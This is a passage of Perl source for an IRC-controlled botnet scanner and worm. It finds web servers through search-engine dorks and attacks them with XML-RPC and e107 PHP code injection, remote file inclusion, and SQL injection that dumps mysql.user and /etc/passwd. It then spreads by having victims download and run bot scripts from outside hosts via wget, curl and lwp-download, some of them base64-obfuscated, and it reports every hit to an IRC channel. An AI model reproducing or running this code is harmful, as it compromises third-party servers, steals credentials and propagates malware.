my @xmlgoogle=&google($dork);
push(@xmltotal, @xmlgoogle);
}
if ($engz =~ /AllTheWeb/) {
my @xmlalltheweb=&alltheweb($dork);
push(@xmltotal, @xmlalltheweb);
}
if ($engz =~ /Bing/) {
my @xmlBing=&Bing($dork);
push(@xmltotal, @xmlBing);
}
if ($engz =~ /ALtaViSTa/) {
my @xmlaltavista=&altavista($dork);
push(@xmltotal, @xmlaltavista);
}
if ($engz =~ /AsK/) {
my @xmlask=&ask($dork);
push(@xmltotal, @xmlask);
}
if ($engz =~ /UoL/) {
my @xmluol=&uol($dork);
push(@xmltotal, @xmluol);
}

if ($engz =~ /YahOo/) {
my @xmlyahoo=&yahoo($dork);
push(@xmltotal, @xmlyahoo);
}
my @xmlclean = &calculate(@xmltotal);
if (scalar(@xmlclean) != 0) {
}
my $uni=scalar(@xmlclean);
foreach my $xmltarget (@xmlclean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel ::14,1(7@14XML14)14(4@14$engz14)14
Scanning Done For7 $dork");
}
my $xpl = "http://".$xmltarget.$bugz;
my $xmlsprd = "cd /tmp;lwp-download http://iseulbi.com/xe/mysh.t
xt;perl mysh.txt;rm -rf *.txt*;wget http://iseulbi.com/xe/mysh.txt;perl mysh.txt
;rm -rf *.txt*";
my $strona = getcontent($xpl);
if ( $strona =~ /faultCode/ ) {
xmlcek($xpl);
xmlxspread($xpl,$xmlsprd);
}
}
}
sub rfiscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @rfigoogle=&google($dork);
push(@rfitotal, @rfigoogle);
}
if ($engz =~ /AllTheWeb/) {
my @rfialltheweb=&alltheweb($dork);
push(@rfitotal, @rfialltheweb);
}
if ($engz =~ /Bing/) {
my @rfiBing=&Bing($dork);
push(@rfitotal, @rfiBing);
}
if ($engz =~ /ALtaViSTa/) {
my @rfialtavista=&altavista($dork);
push(@rfitotal, @rfialtavista);
}
if ($engz =~ /AsK/) {
my @rfiask=&ask($dork);
push(@rfitotal, @rfiask);
}
if ($engz =~ /UoL/) {
my @rfiuol=&uol($dork);
push(@rfitotal, @rfiuol);
}
if ($engz =~ /YahOo/) {
my @rfiyahoo=&yahoo($dork);
push(@rfitotal, @rfiyahoo);
}

my @rficlean = &calculate(@rfitotal);
if (scalar(@rficlean) != 0) {
}
my $uni=scalar(@rficlean);
foreach my $rfitarget (@rficlean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel ::14,1(7@14RFI14)14(4@14$engz14)14
Scanning Done For7 $dork");
}
my $rfixpl = "http://".$rfitarget.$bugz.$rfiid;
my $inj
= " http://".$rfitarget."12".$bugz."7[PHPCMD]?";
my $re = getcontent($rfixpl);
if ($re =~ /ratoscan4/){
getcontent($rfispd);
os($rfixpl);
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14RFI14)3$
inj0 $os");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14RFI14)3$i
nj0 $os");
}
}
}
sub sqlscan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @sqlgoogle=&google($dork);
push(@sqltotal, @sqlgoogle);
}
if ($engz =~ /AllTheWeb/) {
my @sqlalltheweb=&alltheweb($dork);
push(@sqltotal, @sqlalltheweb);
}
if ($engz =~ /Bing/) {
my @sqlBing=&Bing($dork);
push(@sqltotal, @sqlBing);
}
if ($engz =~ /ALtaViSTa/) {
my @sqlaltavista=&altavista($dork);
push(@sqltotal, @sqlaltavista);
}
if ($engz =~ /AsK/) {
my @sqlask=&ask($dork);
push(@sqltotal, @sqlask);
}
if ($engz =~ /UoL/) {
my @sqluol=&uol($dork);
push(@sqltotal, @sqluol);
}
if ($engz =~ /YahOo/) {
my @sqlyahoo=&yahoo($dork);
push(@sqltotal, @sqlyahoo);
}
my @sqlclean = &calculate(@sqltotal);
if (scalar(@sqlclean) != 0) {
}

my $uni=scalar(@sqlclean);
foreach my $sqltarget (@sqlclean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)14(4@14$engz14)14 Scan
ning Done For14 $dork");
}
my $xpl = "http://".$sqltarget.$bugz."'";
my $vuln = "http://".$sqltarget."12".$bugz."7[SQL]";
my $sqlsite = "http://".$sqltarget.$bugz;
my $strona = getcontent($xpl);
if ( $strona =~ m/You have an error in your SQL syntax/i || $strona =~ m
/Query failed/i || $strona =~ m/SQL query failed/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(7@14MySQL1
4)7 $vuln ");&sqlbrute($sqlsite);}
elsif ( $strona =~ m/ODBC SQL Server Driver/i || $strona =~ m/Un
closed quotation mark/i || $strona =~ m/Microsoft OLE DB Provider for/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(7@14MsSQL1
4)7 $vuln ");}
elsif ( $strona =~ m/Microsoft JET Database/i || $strona =~ m/OD
BC Microsoft Access Driver/i )
{sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(7@14MsAcc
ess14)7 $vuln ");}
}
}
sub cmde107() {
my $path = $_[0];
my $incmd = $_[1];
my $codecmd = encode_base64($incmd);
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base
64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"))';print $cmd
;
$access = new LWP::UserAgent;
$access->agent("Mozilla/5.0");
my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%
5B%2Fphp%5D");
my $res = $access->request($req);
my $data = $res->as_string;
if ( $data =~ /ByroeNet(.*)/ ){
$mydata = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e107-CMD14)4 $mydata");
}
}
sub e107scan() {
my $engz = $_[0];
my $bugz = $_[1];
my $dork = $_[2];
my $contatore = 0;
if ($engz =~ /GooGLe/) {
my @e107google=&google($dork);
push(@e107total, @e107google);
}
if ($engz =~ /AllTheWeb/) {
my @e107alltheweb=&alltheweb($dork);
push(@e107total, @e107alltheweb);
}

if ($engz =~ /Bing/) {
my @e107Bing=&Bing($dork);
push(@e107total, @e107Bing);
}
if ($engz =~ /ALtaViSTa/) {
my @e107altavista=&altavista($dork);
push(@e107total, @e107altavista);
}
if ($engz =~ /AsK/) {
my @e107ask=&ask($dork);
push(@e107total, @e107ask);
}
if ($engz =~ /UoL/) {
my @e107uol=&uol($dork);
push(@e107total, @e107uol);
}
if ($engz =~ /YahOo/) {
my @e107yahoo=&yahoo($dork);
push(@e107total, @e107yahoo);
}
my @e107clean = &calculate(@e107total);
if (scalar(@e107clean) != 0) {
}
my $uni=scalar(@e107clean);
foreach my $e107target (@e107clean)
{
$contatore++;
if ($contatore==$uni-1){
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e10714)(4@14$engz14)14
Scanning Done For7 $dork");
}
my $cmd = "echo(base64_decode(\"Vm9v\").php_uname().base64_decod
e(\"RG9v\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW50dHJhY3RvcnMuY28udWs
vaW1hZ2VzL25ldy9wYm90LnR4dD8=\"));include(base64_decode(\"aHR0cDovL3d3dy52aW5jZW
50dHJhY3RvcnMuY28udWsvaW1hZ2VzL25ldy9teXNwLnR4dD8=\"));";
my $ua = LWP::UserAgent->new or die;
$ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
$ua->timeout(15);
my $xpl = "http://".$e107target."/contact.php";
$xpl =~ s/\/\/contact.php/\/contact.php/g;
my $req = HTTP::Request->new(POST => $xpl);
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3B
die%28%29%3B%5B%2Fphp%5D");
my $res = $ua->request($req);
my $cont = $res->content;
if ($cont =~ /Voo(.*)Doo/) {
my $uname = $1;
$uname=~s/\n//;
$uname=~s/\r//;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7
@14e10714)(3$xpl14)0 $uname ");
&spreade107($xpl);
}
}
}
sub spreade107() {
my $path = $_[0];
my $incmd = "cd /var/tmp; curl -O http://www.otbr.com.br/bot.txt; perl bot.txt;

wget http://www.otbr.com.br/bot.txt; perl bot.txt; lwp-download http://www.otbr.

com.br/bot.txt; perl bot.txt; rm -rf bot.txt";
my $codecmd = encode_base64($incmd);
my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base
64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"))';print $cmd
;
$access = new LWP::UserAgent;
$access->agent("Mozilla/5.0");
my $req = new HTTP::Request POST => $path;
$req->content_type('application/x-www-form-urlencoded');
$req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%
5B%2Fphp%5D");
my $res = $access->request($req);
my $data = $res->as_string;
if ( $data =~ /ByroeNet(.*)/ ){
$mydata = $1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14e107-CMD14)4 $mydata");
}
}
sub enc()
{
my $md5_hash = $1;
my $md5_generated = md5_hex($md5_hash);
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14md5 Encode14)7 $md5_generated"
);
}
sub dec()
{
my $md5 = $1;
my $crac = 'http://md5.noisette.ch/md5.php?hash='.$md5;
my $found = getcontent($crac);
if
($found =~ /<string><!\[CDATA\[(.*)\]\]><\/string>/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14md5 De
code14)7 $1");
}
else
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14md5 De
code14)7 $1");
}
}
sub xmlcek {
my $xmltgt = $_[0];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13mb0t';echo`uname -a`;echo'j13mb0t';exit;/*</name></
value></param></params></methodCall>";
my $response = $userAgent->request(POST $xmltgt, Content_Type => 'text/xml', Con
tent => $exploit);
if ($response->content =~ /j13mb0t(.*)j13mb0t/s) {
$os=$1;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14XML14)(3$xmltgt14)0 $os ");
sendraw($IRC_cur_socket, "PRIVMSG $runner :14,1(7@14XML14)(3$xmltgt14)0 $os ");
}}
sub xmlxspread() {
my $xmltargt = $_[0];

my $xmlsprd = $_[1];
my $userAgent = LWP::UserAgent->new(agent => 'perl post');
$exploit = "<?xml version=\"1.0\"?><methodCall>";
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13m';echo`".$xmlsprd."`;echo'b0T';exit;/*</name></val
ue></param></params></methodCall>";
my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', C
ontent => $exploit);
}
sub getcontent() {
my $url = $_[0];
my $req = HTTP::Request->new(GET => $url);
my $ua = LWP::UserAgent->new();
$ua->timeout(15);
my $response = $ua->request($req);
return $response->content;
}
sub lfiexploit() {
my $url = $_[0];
my $rce = $_[1];
my $agent = "<?php echo \"j13mb0t#\"; passthru(\'".$rce."\'); echo \"#j13mb0
t\"; ?>";
my $ua = LWP::UserAgent->new(agent => $agent);
$ua->timeout(15);
my $req = HTTP::Request->new(GET => $url);
my $response = $ua->request($req);
return $response->content;
}
sub google(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=0; $b<=1000; $b+=100){
my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&s
tart=".$b);
my $Res=query($Go);
while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
if ($1 !~ /google/){
my $k=$1;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
sub SIGN() {
if (($powered !~ /M/)||($mail !~ /web/)) {
print "\nLamer!!! Bodoh ToloL Oon !!! Udah Gak Usah diRubah Lagi!!!\n\n";
exec("rm -rf $0 && pkill perl");
}
}
sub alltheweb() {
my @lst;
my $key = $_[0];
my $b = 0;

my $pg = 0;
for ($b=0; $b<=1000; $b+=100) {
my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=10
0&q=".key($key)."&o=".$b);
my $Res = query($all);
while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
my $k = $1;
$k =~ s/ //g;
my @grep = links($k);
push( @lst, @grep );
}
}
return @lst;
}
sub uol() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&st
art=".$b);
my $Res = query($UoL);
while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
my $k = $1;
if ( $k !~ /busca|uol|yahoo/ ) {
my $k
= $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub Bing() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10) {
my $bing = ("http://www.bing.com/search?q=".key($key)."&filt=all&first="
.$b."&FORM=PERE");
my $Res = query($bing);
while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
if ( $1 !~ /msn|live|bing/ ) {
my $k
= $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub altavista(){
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=1000; $b+=10){
my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1

&q=".key($key)."&stq=".$b);
my $Res=query($AlT);
while ($Res=~m/<span class=ngrn>(.+?)\//g){
if ($1 !~ /altavista/){
my $k=$1;
$k=~s/<//g;
$k=~s/ //g;
my @grep=links($k);
push(@lst,@grep);
}
}
}
return @lst;
}
sub ask() {
my @lst;
my $key = $_[0];
my $b = 0;
my $pg = 0;
for ($b=0; $b<=1000; $b+=10) {
my $Ask = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=E
E90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$b);
my $Res = query($Ask);
while ($Res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
if ($1 !~ /ask.com/){
my $k = $1;
my @grep = links($k);
push( @lst, @grep );
}
}
}
return @lst;
}
sub yahoo() {
my @lst;
my $key = $_[0];
my $b = 0;
for ($b=1; $b<=500; $b+=1) {
my $yahoo = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
my $Res = query($yahoo);
while ($Res =~ m/26u=(.*?)%26w=/g) {
if ($1 !~ /yahoo/){
my $k = $1;
my @grep = links($k);
push(@lst, @grep);
}
}
}
return @lst;
}
sub os() {
my $target=$_[0];
my $re = &query($target);
while ($re =~ m/<br>OSTYPE:(.+?)\<br>/g) {
$os = $1;
}
}

sub query($) {
my $url = $_[0];
$url =~ s/http:\/\///;
my $host = $url;
my $query = $url;
my $page = "";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~ s/$host//;
if ( $query eq "" ) { $query = "/"; }
eval {
my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto =>
"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mo
zilla/5.0\r\n\r\n";
my @r = <$sock>;
$page = "@r";
close($sock);
};
return $page;
}
sub links() {
my @l;
my $link = $_[0];
my $host = $_[0];
my $hdir = $_[0];
$hdir =~ s/(.*)\/[^\/]*$/\1/;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host .= "/";
$link .= "/";
$hdir .= "/";
$host =~ s/\/\//\//g;
$hdir =~ s/\/\//\//g;
$link =~ s/\/\//\//g;
push( @l, $link, $host, $hdir );
return @l;
}
sub key() {
my $dork = $_[0];
$dork =~ s/ /\+/g;
$dork =~ s/:/\%3A/g;
$dork =~ s/\//\%2F/g;
$dork =~ s/&/\%26/g;
$dork =~ s/\"/\%22/g;
$dork =~ s/,/\%2C/g;
$dork =~ s/\\/\%5C/g;
return $dork;
}
sub calculate {
my @calculate = ();
my %visti = ();
foreach my $element (@_) {
$element =~ s/\/+/\//g;
next if $visti{$element}++;
push @calculate, $element;
}
return @calculate;

}
sub sqlbrute() {
my $site=$_[0];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
for ($column = 0 ; $column < $columns ; $column ++)
{
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
{
$inyection = '';
$union = '';
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inye
ction.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
{
$column ++;
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)3 $sql ");
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$response=get($sql)or die("[-] Impossible to get Information_Schema\n")
;
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn.
"from".$cmn."information_schema.tables".$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(4
@14INFO_SCHEMA14)3 $sql ");
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."mysql.user".$cfin;
$response=get($sql)or die("[-] Impossible to get MySQL.User\n");
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn.
"from".$cmn."mysql.user".$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(4
@14USER14)3 $sql ");
}
else
{
}
while ($loadcont < $column-1)
{
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f657463
2f706173737764)".$loadfile.$cfin;
$response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
if($response =~ /root:x:/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7@14SQL14)(4
@14Load File14)3 $sql ");
}

else
{
}
foreach $tabla(@tabele)
{
chomp($tabla);
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e7
0776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to ge
t tables\n");
if($response =~ /loginpwnz/)
{
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$
cmn."from".$cmn.$tabla.$cfin;
sendraw($IRC_cur_socket, "PRIVMSG $chann
el :14,1(7@14SQL15)(4@14Tabel14)3 $sql ");
&tabelka($site,$tabla);
}
}
}
}
}
sub tabelka() {
my $site=$_[0];
my $tabla=$_[1];
my $cfin.="--";
my $cmn.= "+";
chomp($tabla);
foreach $columna(@kolumny)
{
chomp($columna);
$sql=$site."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696
e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
$response=get($sql)or die("[-] Impossible to get columns\n");
if ($response =~ /loginpwnz/)
{
sendraw($IRC_cur_socket, "PRIVMSG $channel :14,1(7
@14SQL15) (7@14SQLi Vuln14)3 $site 14(4@14Kolom14)3 $columna 14(4@14Tabel14)3 $tabla ");
}
}
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub join {
sendraw("JOIN $_[0]");
}
sub part {
sendraw("PART $_[0]");
}

sub quit {
sendraw("QUIT $_[0]");
exit;
}